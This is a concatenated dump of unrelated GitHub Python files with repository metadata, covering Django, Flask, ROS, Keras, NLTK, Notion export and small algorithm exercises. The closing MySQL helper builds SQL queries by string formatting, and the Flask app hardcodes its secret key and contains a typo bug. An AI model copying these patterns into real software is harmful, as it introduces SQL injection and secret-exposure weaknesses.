urllib.parse.urlencode(qs, doseq=1)\n newurl = urlunparse([newqs if i == 4 else x for i,x in enumerate(parsed)])\n advertiser = item.find('advertiser').text\n designer = item.find('designer').text\n image_url = item.find('image_url').text\n price = item.find('price').text\n commission = item.find('commission').text\n product_to_save = Product.objects.create(product_id=product_id, product_name=product_name, product_url=newurl, advertiser=advertiser, designer=designer, image_url=image_url, price=price, commission=commission)\n product_to_save.save()\n return HttpResponse()\n\n\n\n\n\n","repo_name":"wuno/django-rest","sub_path":"serviceapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9908319960","text":"\"\"\"Program to count the votes of political parties\r\nShane Robinson\r\n20 April\"\"\"\r\n\r\nprint(\"Independent Electoral Commission\")\r\nprint(\"--------------------------------\")\r\nprint(\"Enter the names of parties (terminated by DONE):\\n\")\r\nname = input()\r\nparties = []\r\n\r\nwhile name!='DONE':\r\n parties.append(name)\r\n name = input()\r\n\r\nparties.sort() #orders list\r\nprint(\"Vote counts:\")\r\n\r\nwhile parties!=[]:\r\n party = parties[0]\r\n num = parties.count(party) #count occurrences of first item in list\r\n for i in range(num):\r\n parties.remove(party) #remove all occurrences of first item\r\n print(party, \" \"*(9-len(party)), \"-\", num)","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/rbnsha013/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37013031646","text":"def maxSubArray(nums):\n # e = nums\n # temp = 0\n # result = 0\n # p = len(e)\n # for i in range(0, p):\n # temp = 0\n # for j in range(0, p):\n # temp += e[j]\n # result += temp\n # return result\n if len(nums) == 1:\n return nums[0]\n\n sum_r = [0 for i in range(len(nums))]\n sum_r[0] = nums[0]\n\n for i in range(1,len(nums)):\n if sum_r[i-1] < 0:\n sum_r[i] = nums[i]\n else:\n sum_r[i] = sum_r[i-1] + nums[i]\n\n return max(sum_r)\n\n\n\nl = [4,-1,3,5,2]\n\nprint(maxSubArray(l))","repo_name":"akashnadimpally/DSALGO","sub_path":"ALGO/MaxValueSubArray.py","file_name":"MaxValueSubArray.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40173561217","text":"from graphviz import Digraph\nfrom IPython.display import display\n\noption = \"depth2normal\"\n\nif 0:\n g = Digraph('G', format='png')\n\n g.attr(rankdir='TB', size='16,16')\n\n g.attr('node', shape='box')\n g.node('A', '1. Initialize variables\\n\\n'\n '- vertexMapz, vertexMapx_, vertexMapy_\\n'\n '- utanMap_x, utanMap_y, utanMap_z\\n'\n '- vtanMap_x, vtanMap_y, vtanMap_z')\n\n g.node('B', '2. Compute vertex maps\\n\\n'\n '- vertexMapx_ = vertexMapxx .* vertexMapz\\n'\n '- vertexMapy_ = vertexMapyy .* vertexMapz')\n\n g.node('C', '3. Compute U-tan and V-tan\\n\\n'\n '- Calculate differences for utanMap_*\\n'\n '- Calculate differences for vtanMap_*')\n\n g.node('D', '4. Compute and normalize normal vectors\\n\\n'\n '- Calculate normalsEig_* using cross product\\n'\n '- Normalize normalsEig_* vectors')\n\n g.node('E', '5. Convert normal vectors to OpenCV format\\n\\n'\n '- Convert Eigen matrices to cv::Mat\\n'\n '- Merge channels into _normalsCV')\n\n g.node('F', '6. Blur normal map\\n\\n'\n '- cv::blur(_normalsCV, _normalsCV, cv::Size(_cellSize, _cellSize))\\n'\n '- Split channels back into separate cv::Mats')\n\n g.node('G', '7. Normalize normal vectors again\\n\\n'\n '- Convert cv::Mat back to Eigen matrices\\n'\n '- Normalize normalsEig_* vectors')\n\n g.node('H', '8. Store final normal map\\n\\n'\n '- Convert Eigen matrices to cv::Mat\\n'\n '- Merge channels into _normalsCV')\n\n g.edges(['AB', 'BC', 'CD', 'DE', 'EF', 'FG', 'GH'])\n\n g.view()\nelif 1:\n dot = Digraph(\"Callback Function Flowchart\", format=\"png\")\n\n dot.node(\"A\", \"1. 开始\")\n dot.node(\"B\", \"2. 计时并输出处理第n帧信息\\nnth_frame\")\n dot.node(\"C\", \"3. 更新ros_header并计算时间差\\ntime_diff\")\n dot.node(\"D\", \"4. 尝试将深度图像从ROS消息转换为OpenCV矩阵\\ncv_bridge::toCvShare\")\n dot.node(\"E\", \"5. 进行类型转换(如果需要)\\nimD.convertTo\")\n dot.node(\"F\", \"6. 调整图像尺寸\\ncv::resize\")\n dot.node(\"G\", \"7. 检查是否初始化\\ninitialized\")\n dot.node(\"H1\", \"8.1 计算法线图\\nEfficientDepth2NormalMap\")\n dot.node(\"H2\", \"8.2 初始化rotation_rel和rotation_key\")\n dot.node(\"I1\", \"9.1 计算法线图\\nEfficientDepth2NormalMap\")\n dot.node(\"I2\", \"9.2 初始化AnglesMap\")\n dot.node(\"I3\", \"9.3 计算旋转矩阵\\nEfficientNormal2RotationMat\")\n dot.node(\"I4\", \"9.4 更新rotation_rel\")\n dot.node(\"J\", \"10. 检查是否初始化\\ninitialized\")\n dot.node(\"K\", \"11. 重新投影点云\\nreproject\")\n dot.node(\"L\", \"12. 获取响应\\nget_response\")\n dot.node(\"M\", \"13. 计算PSR\\nget_psr\")\n dot.node(\"N\", \"14. 优化关键点云位姿\\nrefine_keyclouds_poses\")\n dot.node(\"O\", \"15. 发布位姿\\npublish_poses\")\n dot.node(\"P\", \"16. 发布twist(如果需要)\\npublish_twists\")\n dot.node(\"Q\", \"17. 发布增量关键帧协方差(如果需要)\\npublish_incremental_keypose_cov\")\n dot.node(\"R\", \"18. 检查PSR、有效点数和旋转角度\\npsr, valid_points\")\n dot.node(\"S\", \"19. 输出分辨率、计时信息和PSR\\nresolution, time_use, psr\")\n dot.node(\"T\", \"20. 显示可视化结果(如果需要)\\nshow\")\n dot.node(\"U\", \"21. 增加帧数\\nnth_frame++\")\n dot.node(\"V\", \"22. 结束\")\n\n dot.edges([(\"A\", \"B\"), (\"B\", \"C\"), (\"C\", \"D\"), (\"D\", \"E\"), (\"E\", \"F\"), (\"F\", \"G\"), (\"G\", \"H1\"), (\"H1\", \"H2\"), (\"G\", \"I1\"), (\"I1\", \"I2\"), (\"I2\", \"I3\"), (\"I3\", \"I4\"), (\"I4\", \"J\"), (\"J\", \"K\"), (\"K\", \"L\"), (\"L\", \"M\"), (\"M\", \"N\"), (\"N\", \"O\"), (\"O\", \"P\"), (\"P\", \"Q\"), (\"Q\", \"R\"), (\"R\", \"S\"), (\"S\", \"T\"), (\"T\", \"U\"), (\"U\", \"V\")])\n dot.view()\n\n","repo_name":"yangzheng-yz/ni-rgbd-slam","sub_path":"src/ni_slam/script/show_flowchart.py","file_name":"show_flowchart.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71673122679","text":"# coding=utf-8\n__author__ = 'smallfly'\n\nfrom flask_restful import Resource\nfrom flask_restful.reqparse import RequestParser\nfrom app.mod_interaction.database_operations import common\nfrom app.mod_interaction import models\nfrom app import db\nimport random\n\nNUMBERS = [str(i) for i in range(10)]\n\ndef generate_collection_id(length=6):\n collection_id = \"\"\n for i in range(length):\n collection_id += random.choice(NUMBERS)\n return collection_id\n\ndef check_existence(collection_id):\n collector = common.query_single_by_filed(models.Collector, \"collection_id\", collection_id)\n if collector is None:\n return False\n return True\n\n\nclass CollectorResource(Resource):\n \"\"\"\n 用于申请课表收集的API\n \"\"\"\n\n POST_PARSER = RequestParser(trim=True)\n GET_PARSER = RequestParser(trim=True)\n\n def get(self):\n self.GET_PARSER.add_argument(\"username\", required=True, location=\"headers\")\n self.GET_PARSER.add_argument(\"token\", required=True, location=\"headers\")\n\n args = self.GET_PARSER.parse_args()\n user = common.query_single_by_filed(models.User, \"account\", args[\"username\"])\n if user is None:\n return {\"error\": \"user doesn't exist\"}, 404\n token_check = {\n \"uid\": user.id,\n \"token\": args[\"token\"]\n }\n if not common.check_token(token_check):\n return {\"error\": \"token is wrong\"}, 401\n\n collectors = models.Collector.query.filter_by(uid=user.id).all()\n result = []\n for collector in collectors:\n count = models.SyllabusCollection.query.with_entities(models.SyllabusCollection.collection_id).filter_by(collection_id=collector.collection_id).count()\n result.append(\n {\n \"collection_id\": collector.collection_id,\n \"start_year\": collector.start_year,\n \"season\": collector.season,\n \"count\": count\n }\n )\n # collectors = [ dict(collection_id=x.collection_id, start_year=x.start_year, season=x.season) for x in collectors ]\n\n return {\"collection_ids\": result}\n\n def post(self):\n \"\"\"\n 请求地址: /interaction/api/v2/collector\n 参数:\n 必选参数:\n 位置: form\n username 用户账号\n token 用户验证令牌\n start_year 学年的开始年份\n season 春夏秋指定一个, 同学分制\n :return:\n \"\"\"\n self.POST_PARSER.add_argument(\"username\", required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"token\", required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"start_year\", type=int, required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"season\", type=int, required=True, location=\"form\")\n\n args = self.POST_PARSER.parse_args()\n user = common.query_single_by_filed(models.User, \"account\", args[\"username\"])\n if user is None:\n return {\"error\": \"user doesn't exist\"}, 404\n token_check = {\n \"uid\": user.id,\n \"token\": args[\"token\"]\n }\n if not common.check_token(token_check):\n return {\"error\": \"token is wrong\"}, 401\n\n while True:\n collection_id = generate_collection_id()\n if not check_existence(collection_id):\n break\n\n collector = models.Collector(collection_id=collection_id, start_year=args[\"start_year\"], season=args[\"season\"], uid=user.id)\n result = common.add_to_db(db, collector)\n if result == True:\n return {\"collection_id\": collector.collection_id}\n else:\n return {\"error\": \"commit error in mysql\"}, 500\n\n\n\n","repo_name":"xiaofud/syllabus_backend","sub_path":"app/mod_interaction/resources/CollectorResource.py","file_name":"CollectorResource.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5523480226","text":"#!/usr/bin/env python\nimport roslib; roslib.load_manifest('unity_slam')\nimport rospy\nimport tf\nimport tf.msg\nimport geometry_msgs.msg\nimport unity_slam.msg\nimport math\n\nPREFIX = 'freight/'\n\nclass Mover:\n def mover_callback(self, data):\n #t = geometry_msgs.msg.TransformStamped()\n #t.header.frame_id = \"{}base_link\".format(PREFIX)\n #t.header.stamp = rospy.Time.now()\n #t.child_frame_id = \"{}chassis_link\".format(PREFIX)\n #t.transform.translation.x = data.pos_x\n #t.transform.translation.y = data.pos_y\n #t.transform.translation.z = data.pos_z\n\n #t.transform.rotation.x = data.rot_x\n #t.transform.rotation.y = data.rot_y\n #t.transform.rotation.z = data.rot_z\n #t.transform.rotation.w = data.rot_w\n\n #tfm = tf.msg.tfMessage([t])\n br = tf.TransformBroadcaster()\n br.sendTransform((data.pos_x, data.pos_y, data.pos_z),\n (data.rot_x, data.rot_y, data.rot_z, data.rot_w),\n rospy.Time.now(),\n \"freight/chassis_link\",\n \"freight/base_link\")\n ## self.pub_tf.publish(tfm)\n print(data)\n\n def __init__(self):\n ## self.pub_tf = rospy.Publisher(\"/tf\", tf.msg.tfMessage, queue_size = 2)\n self.pub_pr = rospy.Publisher(\"/pr\", unity_slam.msg.PosRot, queue_size = 2)\n\n rospy.Subscriber('pr', unity_slam.msg.PosRot, self.mover_callback)\n\n rospy.spin()\n\n\n\nif __name__ == '__main__':\n rospy.init_node('random_tf_broadcaster')\n mover = Mover()\n\n\n","repo_name":"rmanky/catkin_ws","sub_path":"src/gopher_unity/scripts/random_tf_broadcaster.py","file_name":"random_tf_broadcaster.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7817469192","text":"from fafscripts.modules import notion_new as n, utils as u\nfrom fafscripts.models import FilmProgramme\nfrom docx import Document\nfrom random import randrange\nimport logging\n\n\ndef main(programme, seq, norwegian_mode):\n\n logger = logging.getLogger(__name__)\n\n dropbox_folder = u.get_secret(\"DROPBOX_FOLDER\")\n\n# retrieving a filtered and sorted film db\n programme_id = FilmProgramme.query.filter_by(\n name=programme).first().notion_id\n data_dict = dict()\n n.add_filter_to_request_dict(data_dict, '🎥 Film programmes', 'relation',\n 'contains', programme_id)\n n.add_sorts_to_request_dict(data_dict, seq)\n# n.add_sorts_to_request_dict(data_dict, 'Seq', 'ascending') # sort by sequence (if exists)\n data_source = n.get_db('films', data_dict=data_dict)\n\n doc = Document()\n\n doc.add_paragraph(programme)\n\n for i, film_json in enumerate(data_source['results']):\n # NB: make sure property names and types match those from database\n f = n.Page(json_obj=film_json)\n countries = f.get_list('country')\n if norwegian_mode:\n countries = [u.english_country_to_norwegian(\n country) for country in countries]\n\n film_data = {\n \"title\": f.get_text('english-title'),\n # \"title_ov\": n.get_property(i, \"Original Title\", 'rich_text', source=data_source),\n # \"year\": n.get_property(i, \"Year\", 'select', source=data_source),\n \"director\": f.get_text('director'),\n # \"synopsis\": n.get_property(i, \"Synopsis\", 'rich_text', source=data_source),\n # \"bio\": n.get_property(i, \"Bio\", 'rich_text', source=data_source),\n \"country\": u.list_to_comma_separated(countries),\n # \"runtime\": n.get_property(i, \"Runtime\", 'rich_text', source=data_source), # OBS\n # \"technique\": u.list_to_comma_separated(n.get_property(i, \"Technique\", 'multi_select', source=data_source)),\n # \"production\": n.get_property(i, \"Production\", 'rich_text', source=data_source),\n # \"animation\": n.get_property(i, \"Animation\", 'rich_text', source=data_source),\n # \"seq\": str(i + 2).zfill(2), # OBS\n }\n\n # composing and adding a single line for each film in word document\n p = doc.add_paragraph()\n\n run = p.add_run(film_data.get('title'))\n run.italic = True\n\n run = p.add_run(f\" – {film_data['director']} – {film_data['country']}\")\n run.italic = False\n\n rand = randrange(1000)\n doc.save(f'temp{rand}.docx')\n logger.info('List written.')\n\n if norwegian_mode:\n u.dropbox_upload_local_file(\n f'temp{rand}.docx', f\"{dropbox_folder}/film_lists/{programme}_norsk.docx\")\n else:\n u.dropbox_upload_local_file(\n f'temp{rand}.docx', f\"{dropbox_folder}/film_lists/{programme}.docx\")\n","repo_name":"jsaabel/FilmFestivalHelpers-fafscripts","sub_path":"fafscripts/scripts/film_list_export_script.py","file_name":"film_list_export_script.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"70629770680","text":"# -*- coding:utf-8 -*-\n# 购物车:临时收集数据结构\n\nfrom decimal import Decimal\nfrom django.conf import settings\n\nfrom shop.models import Product\nfrom coupons.models import Coupon\n\n\nclass Cart(object):\n\n def __init__(self, request):\n self.session = request.session\n cart = self.session.get(settings.CART_SESSION_ID)\n if not cart:\n cart = self.session[settings.CART_SESSION_ID] = {}\n self.cart = cart\n self.coupon_id = self.session.get('coupon_id')\n\n @property\n def coupon(self):\n if self.coupon_id:\n return Coupon.objects.get(id=self.coupon_id)\n return None\n\n def get_discount(self):\n if self.coupon:\n return (self.coupon.discount / Decimal('100')) \\\n * self.get_total_price()\n return Decimal('0')\n\n def get_total_price_after_discount(self):\n return self.get_total_price() - self.get_discount()\n\n def add(self, product, quantity=1, update_quantity=False):\n product_id = str(product.id)\n if product_id not in self.cart:\n self.cart[product_id] = {\n 'quantity': 0,\n 'price': str(product.price) # neccessary?\n }\n if update_quantity:\n self.cart[product_id]['quantity'] = quantity\n else:\n self.cart[product_id]['quantity'] += quantity\n self.save()\n\n def save(self):\n self.session.modified = True\n\n def remove(self, product):\n product_id = str(product.id)\n if product_id in self.cart:\n del self.cart[product_id]\n self.save()\n\n def __iter__(self):\n product_ids = self.cart.keys()\n products = Product.objects.filter(id__in=product_ids)\n\n cart = self.cart.copy()\n for product in products:\n cart[str(product.id)]['product'] = product\n\n for item in cart.values():\n item['price'] = Decimal(item['price'])\n item['total_price'] = item['price'] * item['quantity']\n yield item\n\n def __len__(self):\n return sum(item['quantity'] for item in self.cart.values())\n\n def get_total_price(self):\n return sum(Decimal(item['price']) * item['quantity']\n for item in self.cart.values())\n\n def clear(self):\n del self.session[settings.CART_SESSION_ID]\n self.save()\n","repo_name":"ch1huizong/dj","sub_path":"onlineshop/myshop/cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"13182276072","text":"\"\"\"Main Serverr for MHH page/app\n\"\"\"\n\n\nfrom flask import Flask, redirect, request, flash, render_template, jsonify, session\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom jinja2 import StrictUndefined\nfrom model import connect_to_db, db, User, Project, Inventory\n\napp = Flask(__name__)\n# Required to use Flask sessions and the debug toolbar\n\napp.secret_key = \"ProtectTheHoard\"\n\n# This option will cause Jinja to throw UndefinedErrors if a value hasn't\n# been defined (so it more closely mimics Python's behavior)\napp.jinja_env.undefined = StrictUndefined\n\n# This option will cause Jinja to automatically reload templates if they've been\n# changed. This is a resource-intensive operation though, so it should only be\n# set while debugging.\napp.jinja_env.auto_reload = True\n\n# Required to use Flask sessions and the debug toolbar\n#app.secret_key = 'ABC'\n\n\n\n\n@app.route('/')\ndef index():\n \"\"\"Show our index page.\"\"\"\n\n # check to see if user is logged in\n # user_id = session['user_id']\n\n # if user_id is None:\n # return render_template('index.html')\n\n # else:\n # return redirect(f'/user/{user_id}')\n\n # if not display the index page\n\n # if there is a user_id in session\n # display the user profile page?\n\n return render_template('index.html')\n\n@app.route('/index')\ndef index2():\n \"\"\"Show our index page.\"\"\"\n user_id = session['user_id']\n # check to see if user is logged in\n\n\n # if not display the index page\n\n # if there is a user_id in session\n # display the user profile page?\n return render_template('index.html')\n\n@app.route('/login_form')\ndef login_form():\n \"\"\"Bring the User to the login webpage.\"\"\"\n\n return render_template('login_form.html')\n\n\n@app.route('/login', methods=['POST'])\ndef login():\n\n #check to see if user_id is in session\n\n\n \"\"\"Validate email and password and update session.\"\"\"\n\n user_email = request.form.get('email')\n user_password = request.form.get('password')\n\n \n\n user = User.query.filter_by(email=request.form.get('email')).first()\n \n if user.login(request.form.get('password')):\n app.logger.info('Login successful ...')\n session['user_id'] = user.user_id\n flash('Login successful.')\n return redirect(f'/user/{ user.user_id }')\n else:\n app.logger.info('Login failed!')\n return redirect('/login_form')\n\n \n\n\n@app.route(\"/logout\")\ndef process_logout():\n \"\"\"Log user out.\"\"\"\n\n del session[\"user_id\"]\n flash(\"Logged out.\")\n return redirect(\"/\")\n\n\n@app.route(\"/register\")\ndef register():\n \"\"\"Display the form for user to fill out and register for an account.\"\"\"\n return render_template('register.html')\n\n\n@app.route(\"/new_user\", methods=['POST'])\ndef new_user():\n \"\"\"Take the information from the register form and insert this User into \n the database\"\"\"\n email = request.form[\"email\"]\n password = request.form[\"password\"]\n fname = request.form[\"fname\"]\n lname= request.form[\"lname\"]\n username = request.form[\"username\"]\n\n new_user = User(username=username,\n email=email,\n password=password,\n fname=fname,\n lname=lname)\n\n \n #hashing password before storing it\n new_user.create_hashedpw(password)\n\n new_user.save()\n\n # db.session.add(new_user)\n # db.session.commit()\n\n flash(f\"User {email} added.\")\n return redirect(\"/\")\n\n\n@app.route('/user/<user_id>')\ndef user_info(user_id):\n \"\"\"Display user info.\"\"\"\n \n user = User.query.get(user_id)\n inventory = user.inventory\n projects = user.projects\n\n return render_template('user_profile.html', user=user, inventory=inventory,\n projects=projects)\n\n\n@app.route('/user')\ndef user():\n \"\"\" NOTE TO SELF - do I NEED two routes???\"\"\"\n user_id = session['user_id']\n user = User.query.get(user_id)\n\n return redirect(f'/user/{user_id}')\n\n\n@app.route('/add_inv', methods=['POST'])\ndef create_inv():\n \"\"\" Display the form for the user to enter the required info for an \n inventory item \"\"\"\n\n # get the user info saved in session\n user_id = session['user_id']\n\n #get the info from the form\n inv_name = request.form['inv_name']\n inv_type = request.form['inv_type']\n description = request.form['description']\n price = request.form['price']\n count_per_package = request.form['count_per_package']\n manufacturer = request.form['manufacturer']\n size = request.form['size']\n\n # Not using picture path yet - just initializing it as a blank\n picture_path=\"\"\n # do we need to process keywords into a python list?\n keywords = request.form['keywords']\n\n \n #create the inv item\n new_inv = Inventory(user_id=user_id,\n inv_name=inv_name,\n inv_type=inv_type,\n description=description,\n price=price,\n count_per_package=count_per_package,\n manufacturer=manufacturer,\n size=size,\n picture_path=picture_path,\n keywords=keywords)\n\n \n\n \n\n #add to session & commit\n # db.session.add(new_inv)\n # db.session.commit()\n new_inf.save()\n\n flash(f\"Inventory Item: {inv_name} added.\")\n\n return redirect('/inventory')\n\n\n@app.route('/add_inv_form')\ndef add_inv_form():\n \"\"\" Add a new inventory item \"\"\"\n return render_template('inv_form.html')\n\n@app.route('/view_inv_item/<int:inv_id>')\ndef get_inv_item(inv_id):\n \"\"\"View an individual inv_item\"\"\"\n\n # get the user info saved in session\n user_id = session['user_id']\n\n #the inv_id was passed in with the route path\n # we can use it to query the db and get an individual inventory\n # item from the inventory table.\n inv_item = Inventory.query.get(inv_id)\n \n #return that info to be displayed on the view_inv_item.html page\n\n return render_template(\"view_inv_item.html\", inv_item=inv_item)\n\n@app.route('/inventory')\ndef view_inventory():\n \"\"\" View all the inventory for a particular user\"\"\"\n\n user_id = session['user_id']\n user = User.query.get(user_id)\n\n inventory = user.inventory\n #get the tools for this user in the inventory table\n # utools_query = db.session.query(inventory).filter_by(inv_type='t').all()\n # usupplies_query = db.session.query(inventory).filter_by(inv_type='s').all()\n\n \n return render_template('inventory.html', user=user, inventory=inventory)\n\n@app.route('/add_proj_form')\ndef add_proj_form():\n return render_template('proj_form.html')\n\n\n@app.route('/add_project', methods=['POST'])\ndef add_project():\n \"\"\" Add a new project \"\"\"\n user_id = session['user_id']\n name = request.form['proj_name']\n status = request.form['status']\n description = request.form['description']\n picture_path = \"\"\n keywords = request.form['keywords']\n tool_list = request.form['tool_list']\n supply_list = request.form['supply_list']\n directions = request.form['directions']\n URL_link = request.form['URL_link']\n\n app.logger.info(\"getting project data from form\")\n new_proj = Project(user_id=user_id,\n status=status,\n name=name,\n description=description,\n picture_path=picture_path,\n keywords=keywords,\n tool_list=tool_list,\n supply_list=supply_list,\n directions=directions,\n URL_link=URL_link)\n\n #add to session & commit\n # db.session.add(new_proj)\n # db.session.commit()\n new_proj.save()\n\n flash(f\"Project: {name} added.\")\n\n return redirect('/projects')\n\n\n@app.route('/projects')\ndef view_projects():\n user_id = session['user_id']\n user = User.query.get(user_id)\n projects = user.projects\n \n \"\"\" Show all the projects for a particular user\"\"\"\n return render_template('projects.html',user=user, projects=projects)\n\n@app.route('/view_proj_item/<int:project_id>')\ndef get_proj_item(project_id):\n \"\"\"View an individual inv_item\"\"\"\n\n # get the user info saved in session\n user_id = session['user_id']\n\n #the inv_id was passed in with the route path\n # we can use it to query the db and get an individual inventory\n # item from the inventory table.\n proj_item = Project.query.get(project_id)\n \n #return that info to be displayed on the view_inv_item.html page\n\n return render_template(\"view_proj_item.html\", proj_item=proj_item)\n\n@app.route('/search')\ndef search():\n \"\"\" Search for specific tools/supplies, and View all of the tools \n and supplies saved in the database- for the user that is logged in \"\"\"\n return render_template('search.html')\n\n# @app.route('/user')\n# def user_profile():\n# \"\"\" Show the profile information of the person logged in\"\"\"\n# return render_template('user_profile.html')\n\n\n\nif __name__ == \"__main__\":\n\n # We have to set debug=True here, since it has to be True at the\n # point that we invoke the DebugToolbarExtension\n app.debug = True\n app.config[\"DEBUG_TB_INTERCEPT_REDIRECTS\"] = False\n\n # make sure templates, etc. are not cached in debug mode\n app.jinja_env.auto_reload = app.debug\n\n connect_to_db(app)\n\n # Use the DebugToolbar\n DebugToolbarExtension(app)\n\n app.run(debug=True, port=5000, host=\"0.0.0.0\")","repo_name":"student-code-reviews/ManageMyHoard","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19932728848","text":"# Importing libraries\nimport numpy as np\n\nimport re\n\nimport spacy\nimport es_core_news_sm\n\nimport nltk\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\n##### FUNCTION #####\n\ndef sentiment_analysis_reviews (reviews_df):\n\n '''\n Function that analyses the sentiment of each IMDB audience review by using the \n Sentiment Intensity Analyzer from the NLTK library.\n\n :args:\n reviews_df: a dataframe with all the reviews.\n\n :return:\n the same dataframe but with 4 new columns: pos, neg, neu and compound.\n \n '''\n \n sia = SentimentIntensityAnalyzer()\n \n positive = []\n negative = []\n neutral = []\n compound = []\n \n for row in reviews_df['Review']:\n\n try:\n positive.append(sia.polarity_scores(row)['pos'])\n negative.append(sia.polarity_scores(row)['neg'])\n neutral.append(sia.polarity_scores(row)['neu'])\n compound.append(sia.polarity_scores(row)['compound'])\n\n except:\n positive.append(np.nan)\n negative.append(np.nan)\n neutral.append(np.nan)\n compound.append(np.nan)\n\n reviews_df['positive sentiment'] = positive\n reviews_df['negative sentiment'] = negative\n reviews_df['neutral sentiment'] = neutral\n reviews_df['compound sentiment'] = compound\n \n return reviews_df\n\n##################################\n\n ","repo_name":"Maya-Souza/SQL-Database-and-Sentiment-Analysis-Before-Sunrise-Trilogy","sub_path":"data_manipulation/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28643922632","text":"# I got an error on my system when I try to train this neural net\n# `Error #15: Initializing libiomp5.dylib, but found libomp.dylib already initialized`\n# Solution: https://stackoverflow.com/questions/53014306/error-15-initializing-libiomp5-dylib-but-found-libiomp5-dylib-already-initial\nimport os\n\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'True'\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\n\ndatagen = ImageDataGenerator(rotation_range=40,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n fill_mode='nearest')\n\ntrain_it = datagen.flow_from_directory('data/weather/train/',\n target_size=(128, 128),\n color_mode='rgb',\n class_mode='categorical',\n batch_size=16)\nvalid_it = datagen.flow_from_directory('data/weather/validation/',\n target_size=(128, 128),\n color_mode='rgb',\n class_mode='categorical',\n batch_size=16)\n\nmodel = keras.Sequential()\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(128, 128, 3)))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (5, 5), activation='relu'))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(32, activation='relu'))\nmodel.add(layers.Dense(4))\nmodel.summary()\n\nmodel.compile(optimizer='adam',\n loss=keras.losses.CategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\nhistory = model.fit(train_it,\n steps_per_epoch=len(train_it),\n validation_data=valid_it,\n validation_steps=len(valid_it),\n epochs=50,\n callbacks=[keras.callbacks.EarlyStopping(patience=10)])\n\nplt.plot(history.history['accuracy'])\nplt.plot(history.history['val_accuracy'])\nplt.title('Model Performance')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n","repo_name":"mrtkp9993/DeepLearningExamples","sub_path":"codes/02_CNN_Img_Classification.py","file_name":"02_CNN_Img_Classification.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"40"} +{"seq_id":"44588141740","text":"def main():\n # Get number of test cases\n test_cases = int(input())\n for test_case in range(1, test_cases + 1):\n _ = input(\"\")\n lis = [int(i) for i in input(\"\").split(\" \")]\n list_len = len(lis)\n already = set()\n count = 0\n out = 0\n for i in range(list_len-1,-1,-1):\n already.add(lis[i])\n count+=1\n if(len(already) != count):\n out = list_len-(count-1)\n break\n print(out)\nif __name__ == \"__main__\":\n main()","repo_name":"Protype8/PythonCompetitionCodes","sub_path":"codeforces/Remove Prefix.py","file_name":"Remove Prefix.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21293416931","text":"import mysql.connector\nimport yaml\nimport os\n\n# file=open(\"config.yaml\",'r')\nwith open(os.path.dirname(__file__)+\"/config.yaml\",'r') as stream:\n try:\n # pyaml.load(stream))\n data=yaml.load(stream)\n # print(dat['password'])\n except yaml.YAMLError as exc:\n print(exc)\n\n\n\n\n\ndef getMySQLconnection():\n # This is the local DB on my PC. Dont get any funny ideas regarding it.\n cnx = mysql.connector.connect(user=data['mysqluser'], password=data['mysqlpassword'],\n host=data['mysqlserver'], database=data['mysqldb'], )\n\n return cnx\n\ndef getAnnotationType(s):\n\n try:\n cnx= getMySQLconnection()\n crsr = cnx.cursor()\n query = (\"select AnnotationTypeID from annotation_type where AnnotationName=\\'{}\\' limit 1\".format(s))\n crsr.execute(query)\n\n i= int(crsr.fetchone()[0])\n crsr.close()\n cnx.close()\n return i\n except Exception as ex:\n return ex\n\n\n\n\n\ndef getEvidenceTypeID(s):\n\n try:\n cnx= getMySQLconnection()\n crsr = cnx.cursor()\n query = (\"select EvTypeID from evidence_type where EvName=\\'{}\\' limit 1\".format(s))\n crsr.execute(query)\n\n i= 